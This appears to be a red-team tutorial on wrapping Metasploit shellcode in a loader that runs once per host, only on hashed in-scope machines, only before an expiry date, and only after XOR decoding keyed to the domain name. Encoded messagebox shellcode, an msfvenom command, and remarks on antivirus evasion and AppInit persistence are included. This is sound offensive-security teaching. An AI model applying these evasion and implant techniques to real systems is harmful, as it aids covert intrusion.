Safer Shellcode Implants

Overview

Almost all simulated attacks will require, at some point, the installation of a remote access tool (RAT) and the establishment of a command and control (C2) channel. Unless you write your own custom RAT, you have limited control over the code that you use. Publicly available options include:

Empire - https://github.com/PowerShellEmpire/Empire
Meterpreter - https://www.metasploit.com/
Cobalt Strike - https://www.cobaltstrike.com/
Pupy - https://github.com/n1nj4sec/pupy
Throwback - https://github.com/silentbreaksec/Throwback

There are three features that I have been looking for:

A check to only allow the implant to run once (either per user or globally).
Validation that the implant is being executed on the correct host or a host within scope.
A check to ensure that the implant is not executed after a certain time (i.e. the end of the engagement).

I have considered this primarily from a persistence perspective but this could equally be applied to code that is executed in order to gain a foothold on the network. This post is written on the assumption that you have generated raw shellcode and wish to add the above functionality to it without rewriting the shellcode. I am aware that some RATs offer some of the above.

All source code is available at https://github.com/stufus/shellcode-implant-stub.

Single Execution

The simplest way of determining whether the implant is already running is to use a mutex; this is exactly the purpose that mutexes are designed for. Mutexes in Windows can be created in the local namespace (effectively per user) or the global namespace (per system). Therefore, the code could:

Attempt to open a mutex called MWR-STUFUS-Implant.
If the mutex exists, quit.
If the mutex does not exist, create it and run the shellcode.
When the owning process exits, the mutex will also be cleared.

If the mutex name is prefixed with Local\, it will be created in the local namespace (effectively per user). If the mutex name is prefixed with Global\, it will be in the global namespace and therefore accessible to everything running on the host, even as other users. A local mutex can therefore be used to ensure that the implant does not execute if it is already running as that user, and a global mutex can be used to ensure that it does not execute if it is already running anywhere on the system.

The prompt for this project was a desire to create an implant DLL that could be executed using the AppInit system; AppInit DLLs are loaded during the DLL_PROCESS_ATTACH stage of User32.dll. An implant placed there will be loaded into almost every application that loads User32.dll, which is most of them, and could result in the implant code being executed thousands of times simultaneously if left unchecked.
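As a rough illustration of the mutex check, the following Python sketch uses ctypes to call the Win32 CreateMutexW function. Note the assumptions: rather than opening the mutex and then creating it as two steps, it creates the mutex in one call and inspects ERROR_ALREADY_EXISTS, and the helper names mutex_name and already_running are hypothetical rather than taken from the project source.

```python
import ctypes
import sys

ERROR_ALREADY_EXISTS = 183  # Win32 error code from winerror.h


def mutex_name(base: str, per_system: bool) -> str:
    """Prefix the name with Global\\ (per system) or Local\\ (per session)."""
    return ("Global\\" if per_system else "Local\\") + base


def already_running(name: str) -> bool:
    """Create the named mutex; return True if it already existed."""
    if sys.platform != "win32":
        raise OSError("named mutexes are only available on Windows")
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.CreateMutexW.restype = ctypes.c_void_p
    kernel32.CreateMutexW.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_wchar_p]
    handle = kernel32.CreateMutexW(None, False, name)
    error = ctypes.get_last_error()
    if not handle:
        raise ctypes.WinError(error)
    # The handle is deliberately never closed, so the mutex lives until the process exits.
    return error == ERROR_ALREADY_EXISTS
```

On a Windows host, already_running(mutex_name("MWR-STUFUS-Implant", per_system=False)) would be expected to return False for the first process in a session and True for any later one while the first is still alive.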

Endpoint Validation

Although some publicly available or commercial tools do not support this, it is important in a targeted attack to ensure that only the client is compromised. One method of doing this is to hardcode certain client-specific identifiers into the implant to prevent execution on unauthorised systems. The technique that I have chosen has the side effect of being slightly more complex to reverse-engineer and is less likely to be detected by signature-based antivirus tools because of its custom nature. The primary purpose of this project is not to evade AV software, but to offer a solution to those who wish to promote implant safety but have not coded their own implants from scratch; nevertheless, the nature of these checks does have the advantage of disguising the true purpose of the implant, which is an obvious benefit.

I am hoping that this will help other attack simulation teams in the industry to develop safer implants and that it will also raise awareness amongst defensive teams to ensure that they can react to customised binaries. Those who have licensed versions of Cobalt Strike could also customise one of the artifact kits to include these techniques, and anyone can create customised templates for Metasploit.

Method

There are a number of ways of representing client specific information within the implant and I have discussed and demonstrated two possible options below.

Static Check

The simplest way of ensuring that the code does not execute on an unauthorised host is to hardcode a host-specific or network-specific identifier in the binary and compare it with the value obtained from the host at runtime. The immediate issue with this approach is that it would be trivial to identify the intended target should the binary be acquired by a third party, which could draw their attention to the existence of the simulated attack. A safer approach is to store a hash instead of the raw data. For example, the following pseudo-code could be used to ensure that the implant only runs on the host MWR1.

$correct_name = "<sha1 of MWR1>"
$current_name = sha1(GetComputerName())
if ($correct_name == $current_name) {
    execute_shellcode()
} else {
    exit()
}

The benefit of this approach is that it is very quick and effective. A variation could be applied if the hosts follow a known pattern (e.g. hash the first few characters), or multiple criteria could be applied such as the IP range, domain name, Windows owner etc.
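A minimal Python sketch of the static check follows. It is only an illustration: the helper names name_hash and host_in_scope are hypothetical, socket.gethostname() stands in for GetComputerName(), and upper-casing the name before hashing is an assumption made so that case differences do not matter.

```python
import hashlib
import hmac
import socket


def name_hash(name: str) -> str:
    """SHA1 of the upper-cased name as a hex string (the normalisation is an assumption)."""
    return hashlib.sha1(name.upper().encode("utf-8")).hexdigest()


def host_in_scope(expected_hash: str, current_name: str) -> bool:
    """Compare the stored hash with the hash of the name seen at runtime."""
    return hmac.compare_digest(expected_hash, name_hash(current_name))


if __name__ == "__main__":
    stored = name_hash("MWR1")  # only this hash, not the name, would be embedded
    print(host_in_scope(stored, socket.gethostname()))
```

The same two functions could be reused for other identifiers, such as the first few characters of a host name that follows a known pattern.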

Runtime Decoding

Another option is to encrypt or encode the raw shellcode with a piece of information which is known at the time of creation and is available at runtime. This has the advantage that an unconnected third party who received the implant would struggle to identify its true functionality because they would have no idea whether the shellcode had been decoded correctly; execution would obviously fail too. It would also frustrate incident response teams or analysis teams because the implant would likely behave differently on their analysis systems. It would not defeat them but could be advantageous in that it would emulate a more advanced RAT without having to recreate customised position-independent shellcode from scratch.

In this example, assume that the domain name (e.g. STUFUS) has been hashed using SHA1 and the resultant 20-byte hash (concatenated with itself multiple times if necessary) has been XOR'd with the shellcode. Mechanically this resembles a one-time pad, although because the key repeats it does not offer the same security. The following pseudo-code illustrates an example of this:

$encoded_shellcode = "\xAA\xBB\xCC\xDD\xEE\xFF"
$decoded_shellcode = ""
$decode_hash = sha1(GetCurrentDomain())
$decode_hash = RepeatHash($decode_hash, length($encoded_shellcode)) /* If the hash was "\x11\x22\x33", return "\x11\x22\x33\x11\x22\x33" so that it is the same length as the shellcode */
for ($i = 0; $i < length($encoded_shellcode); $i++) {
    /* XOR each byte of the shellcode with the matching byte of the repeated domain hash */
    $decoded_shellcode += $encoded_shellcode[$i] ^ $decode_hash[$i]
}
$decoded_shellcode() /* Now run the shellcode in whatever state it's in */
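The encode and decode steps are the same operation, which the following Python sketch tries to show. The function name xor_with_hash is hypothetical, the payload is a run of placeholder bytes rather than real shellcode, and nothing is executed.

```python
import hashlib
from itertools import cycle


def xor_with_hash(data: bytes, secret: str) -> bytes:
    """XOR data with the SHA1 digest of secret, repeating the 20-byte digest as needed."""
    key = hashlib.sha1(secret.encode("utf-8")).digest()
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


payload = bytes(range(48))                          # placeholder bytes, not real shellcode
encoded = xor_with_hash(payload, "STUFUS")          # done once, at build time
print(xor_with_hash(encoded, "STUFUS") == payload)  # True: the right domain restores it
print(xor_with_hash(encoded, "OTHER") == payload)   # False: a wrong domain yields garbage
```

Because the key is derived at runtime, the stub itself contains neither the domain name nor the plain payload.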

Expiry Time

This is a straightforward check; the simplest method is to retrieve the current year and month and ensure that they do not exceed the end of the engagement. The following simple pseudo-code would ensure that the code can only execute between 1st January 2016 and 31st July 2016. Obviously the day and time can also be included for more granular control if this is needed.

$year = GetCurrentYear()
$month = GetCurrentMonth()

if ($year==2016 && $month>=1 && $month<=7) {
    ...
} else {
    exit()
}
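Where day-level granularity is wanted, comparing whole dates is simpler than comparing year and month separately. The following Python sketch assumes the same engagement window as the pseudo-code; within_engagement, START and END are hypothetical names.

```python
from datetime import date


def within_engagement(today: date, start: date, end: date) -> bool:
    """True if today falls inside the engagement window, both ends inclusive."""
    return start <= today <= end


START = date(2016, 1, 1)
END = date(2016, 7, 31)
print(within_engagement(date(2016, 7, 31), START, END))  # True
print(within_engagement(date(2016, 8, 1), START, END))   # False
```

In a real stub, date.today() would supply the first argument; bear in mind that this trusts the clock of the host.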

Implementation

I initially implemented this in Win32 Assembly language using MASM32, and subsequently rewrote this in C. These two implementations are separate and have subtle differences, and I have discussed each one independently. Personally I prefer and use the assembly version. All source code is available at https://github.com/stufus/shellcode-implant-stub.

Win32 Assembly (MASM)

The barrier to entry when coding using MASM's high level syntax is nowhere near as high as you may imagine. Although you do need to understand assembly language, the macros and syntax that it supports do make the code a lot clearer and, where I can, I have used this syntax in order to keep the code as clear as possible. I have commented the code in some detail and hope that the combination of this narrative and the commented code will be enough.

Some of the best tutorials I found online are Iczelion's Win32 assembly tutorials, accessible at http://win32assembly.programminghorizon.com/tutorials.html. He has done some amazing work with MASM including Code Snippet Creator (accessible at http://win32assembly.programminghorizon.com/source1.html) which is a tool for manipulating PE files written entirely in Win32 assembly. I remember talking to him about it on EFNet about 15 years ago; it's a tool for injecting assembly code into another EXE and sorting out the sections, alignment and relocation. That particular tool may seem a little manual by today's standards and you may want to change a couple of constants in the source code, but I still think it's a very clever tool.

If you're interested in Win32 assembly, you could learn a lot from him. I certainly did.

Compiling

The Microsoft Assembler (MASM) is available for download for free at http://www.masm32.com/. It contains an installer and a number of libraries. For the rest of this article, I shall assume that you have installed it in C:\MASM32. The source code can be found in the \stub-masm-exe directory, and compiling it is as simple as executing makeit.bat. This should generate a console window containing output not unlike the below:

Microsoft (R) Macro Assembler Version 6.14.8444
Copyright (C) Microsoft Corp 1981-1997. All rights reserved.

Assembling: stub-exe.asm

***********
ASCII build
***********

Volume in drive G is STUFUS
Volume Serial Number is 344C-D851

Directory of G:\shellcode-implant-stub\stub-masm-exe

19/03/2016 19:24 14,129 stub-exe.asm
29/03/2016 20:27 2,475 stub-exe.obj
29/03/2016 20:27 2,560 stub-exe.exe
3 File(s) 19,164 bytes
0 Dir(s) 400,551,542,784 bytes free
Press any key to continue . . .

Customisation

The .data section can be considered to be the home of the global initialised variables. There are a few strings that are defined and I have left a testing messagebox payload in there as an example. I have also written a Python script (raw2src.py) to convert raw shellcode to MASM or C source format; I have explained this further in the example below. The CheckExecution() function is the main function to read through; simply comment out any checks that you do not want to perform. It currently performs the following actions in the following order:

Checks that the current date is within the hardcoded limit (i.e. between January 2016 and July 2016 inclusive) and exits if not.
Checks that a SHA1 hash of the NetBIOS local host name matches the stored hash.
Checks whether the implant is already running and exits if so. The example uses a local mutex named Stufus; this has the effect of running once per session (in most cases, once per user).
Obtains a SHA1 hash of the domain name and XORs the stored shellcode against that hash.
Runs the shellcode.
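The ordering of the checks listed above can be sketched in Python as follows. This is not the code from the repository: check_execution and its four callable parameters are hypothetical names chosen for illustration, and the function returns the decoded bytes instead of running anything.

```python
from typing import Callable, Optional


def check_execution(
    date_ok: Callable[[], bool],
    host_ok: Callable[[], bool],
    already_running: Callable[[], bool],
    decode: Callable[[], bytes],
) -> Optional[bytes]:
    """Apply the checks in the listed order; return decoded bytes, or None to exit."""
    if not date_ok():          # 1. outside the engagement window
        return None
    if not host_ok():          # 2. host name hash does not match
        return None
    if already_running():      # 3. the mutex already exists
        return None
    return decode()            # 4. XOR against the domain hash


result = check_execution(lambda: True, lambda: True, lambda: False, lambda: b"\x90")
print(result is not None)  # True: every check passed
```

Passing the checks in as callables mirrors the idea of commenting out any check that is not wanted: a check can be disabled by supplying a function that always passes.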

C (Visual Studio)

For consistency, the CheckExecution() function is the main function in terms of invoking the various checks that have been discussed above. It currently performs the following actions in the following order:

Checks that the current date is within the hardcoded limit and exits if not.
Checks that a SHA1 hash of the NetBIOS local host name matches the stored hash.
Checks whether the implant is already running and exits if so. The example uses a global mutex named STUFUS; because a global mutex is visible to all processes regardless of user, the implant will exit if it is already running anywhere on the system.
Obtains a SHA1 hash of the domain name and XORs the stored shellcode against that hash.
Runs the shellcode.

The flowchart below illustrates this process:

Example

In order to demonstrate this, the windows/messagebox payload from Metasploit will be used because it is both safe and visual. However, this could easily be replaced with Meterpreter, Beacon or any other raw payload of your choice.

Generate the raw shellcode

$ msfvenom -p windows/messagebox -f raw -o example-messagebox.raw TITLE="MWR Labs / @ukstufus" ICON=INFO TEXT="The payload has executed"
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 297 bytes
Saved as: example-messagebox.raw

Collect information from the target system

I have put together a very basic PowerShell script (GetComputerInfo.ps1) which performs a small number of WMI calls to dump information relating to localhost; these could be considered a starting point for host-specific or client-specific identifiers.

Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.

PS G:\shellcode-implant-stub> import-module .\GetComputerInfo.ps1
PS G:\shellcode-implant-stub> GetComputerInfo

Domain : stufus.mwr
Manufacturer : innotek GmbH
Model : VirtualBox
Name : TESTER
PrimaryOwnerName : Stuart
TotalPhysicalMemory : 1073270784

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 9600
RegisteredUser : Stuart
Version : 6.3.9600

SMBIOSBIOSVersion : VirtualBox
Manufacturer : innotek GmbH
Name : Default System BIOS
SerialNumber : 0
Version : VBOX - 1

Caption : Intel64 Family 6 Model 58 Stepping 9
DeviceID : CPU0
Manufacturer : GenuineIntel
MaxClockSpeed : 2395
Name : Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
SocketDesignation :

Manufacturer : Oracle Corporation
Model :
Name : Base Board
SerialNumber : 0
SKU :
Product : VirtualBox

There are far more options available, and I will leave it to you to choose attributes that are both practical and consistent across your target. For the purposes of this example, we will hardcode a hash of the computer name (TESTER) and use a hash of the domain name (stufus.mwr) to decode the raw shellcode.

Generate custom shellcode buffers

Regardless of whether the ASM or C route is chosen, the raw shellcode will need to be XOR'd and reformatted so that it can be included in the project source code. For those unfamiliar with XOR, it has two interesting properties. The first is that if "(A xor B) = C" then "(B xor C) = A" and "(A xor C) = B". The second, which is useful for cryptography, is that if you XOR a value with something which is random, the output will be random too (i.e. each bit has an equal probability of being 0 or 1); this is easily provable. Therefore, if we XOR the shellcode with a known value (the hash of the domain), and then XOR the result with the same hash, we will get the shellcode back. We also need to generate the hash of TESTER to store in the source code, and I have written a Python tool which does both:

$ ./raw2src.py -h
usage: raw2src.py [-h] [-c COMPUTERNAME] [-x XOR] [-s SHELLCODE]
                  [-o OUTPUTFORMAT]

Shellcode to C/ASM implant stub converter.

optional arguments:
  -h, --help            show this help message and exit
  -c COMPUTERNAME, --computername COMPUTERNAME
                        Generate the SHA1 hash of the parameter given (e.g. a
                        computer name)
  -x XOR, --xor XOR     XOR the shellcode with the hash of the parameter given
                        (e.g. domain name)
  -s SHELLCODE, --shellcode SHELLCODE
                        The filename containing the shellcode.
  -o OUTPUTFORMAT, --outputformat OUTPUTFORMAT
                        The output format. Can be "C" or "MASM"

For this example, we know that:

The shellcode is in example-messagebox.raw
The name of the host is TESTER and we want to store the hash of TESTER for later comparison
The name of the domain to which the host is attached is stufus.mwr, and we want to XOR the shellcode against the hash of stufus.mwr
The syntax for C is different to the syntax for ASM

MASM

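The command below generates the hash and the XOR'd shellcode and formats the result for assembly by MASM. Cut and paste the output into the .data section of stub-exe.asm. Note that the sample commands in this section were run with stufus.lan as the XOR parameter; substitute the domain name of your own target (stufus.mwr for the host shown above).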

$ ./raw2src.py -c TESTER -x stufus.lan -s example-messagebox.raw -o MASM
; This is the hash of: TESTER
hashSHA1ComputerName db 83,143,104,249,44,163,118,229,35,230,214,169,104,99,222,2,125,118,163,218
hashSHA1ComputerNamelen equ 20

; Shellcode loaded from: example-messagebox.raw
; Shellcode XOR'd with hash of: stufus.lan
shellcode db 160,36,44,190,11,202,219,101,31,23,99,245,102,134,176,9,178,77,78,81
db 242,185,171,236,57,230,164,42,237,46,34,252,224,250,78,139,219,199,233,162
db 152,175,60,11,91,202,164,17,241,46,64,236,215,227,209,243,200,222,179,7
db 89,206,92,132,75,167,164,96,70,164,250,245,80,211,251,132,46,66,248,41
db 126,14,120,106,126,41,196,160,246,217,48,236,218,3,176,34,166,199,211,59
db 242,195,252,236,37,242,46,191,70,161,159,197,71,107,127,92,158,167,251,239
db 113,230,99,238,154,103,237,60,67,235,26,40,253,10,164,135,125,57,177,24
db 125,116,201,191,157,157,168,72,233,247,252,74,80,29,196,241,199,206,80,49
db 21,239,246,15,76,220,1,48,165,208,103,161,221,210,224,240,222,226,50,212
db 159,153,72,50,123,103,237,4,118,13,182,137,19,101,39,92,208,46,103,162
db 134,48,223,63,95,206,15,60,184,195,97,183,199,151,80,11,246,174,24,114
db 89,143,223,43,30,140,92,60,128,242,70,228,158,57,179,36,166,210,177,190
db 17,151,151,71,95,134,90,32,168,193,124,161,215,135,88,16,234,167,75,125
db 17,160,214,3,95,134,95,53,180,201,124,144,199,135,27,73,75,78,116,121
db 97,70,86,86,173,188,124,5,159,90,196,245,111,178,196,45,138
shellcodelen equ 297

C

The output of the command below can be cut and pasted into config.h.

$ ./raw2src.py -c TESTER -x stufus.lan -s example-messagebox.raw -o C
// This is the hash of: TESTER
BYTE hashSHA1ComputerName[] =
"\x53\x8f\x68\xf9\x2c\xa3\x76\xe5\x23\xe6\xd6\xa9\x68\x63\xde\x02\x7d\x76\xa3\xda";
#define hashSHA1ComputerNamelen 20

// Shellcode loaded from: example-messagebox.raw
// Shellcode XOR'd with hash of: stufus.lan
BYTE shellcode[] =
"\xa0\x24\x2c\xbe\x0b\xca\xdb\x65\x1f\x17\x63\xf5\x66\x86\xb0\x09\xb2\x4d\x4e\x51"
"\xf2\xb9\xab\xec\x39\xe6\xa4\x2a\xed\x2e\x22\xfc\xe0\xfa\x4e\x8b\xdb\xc7\xe9\xa2"
"\x98\xaf\x3c\x0b\x5b\xca\xa4\x11\xf1\x2e\x40\xec\xd7\xe3\xd1\xf3\xc8\xde\xb3\x07"
"\x59\xce\x5c\x84\x4b\xa7\xa4\x60\x46\xa4\xfa\xf5\x50\xd3\xfb\x84\x2e\x42\xf8\x29"
"\x7e\x0e\x78\x6a\x7e\x29\xc4\xa0\xf6\xd9\x30\xec\xda\x03\xb0\x22\xa6\xc7\xd3\x3b"
"\xf2\xc3\xfc\xec\x25\xf2\x2e\xbf\x46\xa1\x9f\xc5\x47\x6b\x7f\x5c\x9e\xa7\xfb\xef"
"\x71\xe6\x63\xee\x9a\x67\xed\x3c\x43\xeb\x1a\x28\xfd\x0a\xa4\x87\x7d\x39\xb1\x18"
"\x7d\x74\xc9\xbf\x9d\x9d\xa8\x48\xe9\xf7\xfc\x4a\x50\x1d\xc4\xf1\xc7\xce\x50\x31"
"\x15\xef\xf6\x0f\x4c\xdc\x01\x30\xa5\xd0\x67\xa1\xdd\xd2\xe0\xf0\xde\xe2\x32\xd4"
"\x9f\x99\x48\x32\x7b\x67\xed\x04\x76\x0d\xb6\x89\x13\x65\x27\x5c\xd0\x2e\x67\xa2"
"\x86\x30\xdf\x3f\x5f\xce\x0f\x3c\xb8\xc3\x61\xb7\xc7\x97\x50\x0b\xf6\xae\x18\x72"
"\x59\x8f\xdf\x2b\x1e\x8c\x5c\x3c\x80\xf2\x46\xe4\x9e\x39\xb3\x24\xa6\xd2\xb1\xbe"
"\x11\x97\x97\x47\x5f\x86\x5a\x20\xa8\xc1\x7c\xa1\xd7\x87\x58\x10\xea\xa7\x4b\x7d"
"\x11\xa0\xd6\x03\x5f\x86\x5f\x35\xb4\xc9\x7c\x90\xc7\x87\x1b\x49\x4b\x4e\x74\x79"
"\x61\x46\x56\x56\xad\xbc\x7c\x05\x9f\x5a\xc4\xf5\x6f\xb2\xc4\x2d\x8a";
#define shellcodelen 297
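For readers curious how raw bytes end up in the two layouts shown above, the following is a minimal Python sketch of the formatting step only. It is not raw2src.py itself: the function names to_masm and to_c are hypothetical, and the row width of 20 bytes is simply inferred from the sample output.

```python
from typing import Iterator

ROW_WIDTH = 20  # bytes per row, inferred from the sample output (an assumption)


def rows(data: bytes) -> Iterator[bytes]:
    """Yield the data in consecutive slices of at most ROW_WIDTH bytes."""
    for offset in range(0, len(data), ROW_WIDTH):
        yield data[offset:offset + ROW_WIDTH]


def to_masm(name: str, data: bytes) -> str:
    """Format bytes as MASM 'db' rows followed by a '<name>len equ N' line."""
    if not data:
        raise ValueError("no bytes to format")
    body = [",".join(str(b) for b in row) for row in rows(data)]
    lines = [f"{name} db {body[0]}"] + [f"db {row}" for row in body[1:]]
    lines.append(f"{name}len equ {len(data)}")
    return "\n".join(lines)


def to_c(name: str, data: bytes) -> str:
    """Format bytes as a C BYTE array of \\xNN escapes plus a length #define."""
    if not data:
        raise ValueError("no bytes to format")
    body = ['"' + "".join(f"\\x{b:02x}" for b in row) + '"' for row in rows(data)]
    return f"BYTE {name}[] =\n" + "\n".join(body) + f";\n#define {name}len {len(data)}"


print(to_masm("shellcode", bytes([160, 36, 44])))
print(to_c("shellcode", bytes([160, 36, 44])))
```

Keeping the length as a separate constant matters in the C layout, because the string literal form appends a terminating NUL byte that is not part of the payload.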

Compile the project

Either use Visual Studio (C) or run makeit.bat (ASM) to generate the compiled binary. This can then be tested or executed on the target system.

Limitations & Further Work

Some techniques rely on the real payload executing in the same process rather than, for example, spawning another process and then exiting the parent; the mutex check will not be effective once the wrapper process exits. There is also the obligatory criticism of the hash function choice. SHA-512 or SHA3-512 (Keccak) might be a better choice, particularly because a larger hash may remove the need to repeat and concatenate the hash if the target shellcode is small enough. SHA1 is more than good enough for this purpose though.
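To put rough numbers on the point about hash length, the following Python sketch counts how many copies of a digest are needed to cover a payload of a given size. The function name repeats_needed is hypothetical; the 297-byte figure is the size of the example messagebox payload.

```python
import hashlib
import math


def repeats_needed(payload_len: int, algorithm: str) -> int:
    """Number of digest copies required to cover payload_len bytes."""
    digest_size = hashlib.new(algorithm).digest_size
    return math.ceil(payload_len / digest_size)


for algorithm in ("sha1", "sha512", "sha3_512"):
    print(algorithm, repeats_needed(297, algorithm))
# sha1 15
# sha512 5
# sha3_512 5
```

A 64-byte digest therefore only avoids repetition entirely for payloads of 64 bytes or fewer, which is smaller than the example payload used here.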

There are numerous ways that this project can be extended: additional host indicators could be added or chained together, additional functionality could be introduced (for example, automatic persistence if the code is confident that this is a target system), or a 'kill switch' could be added (e.g. triggered by the withdrawal of a specific file or the introduction of one).

I will, at a later date, commit a DLL and Windows Service version of the above code in assembly language, which can be adapted for techniques such as AppInit loading. However, I would encourage all readers to develop this in their own direction and to contribute ideas and functionality back if able to do so.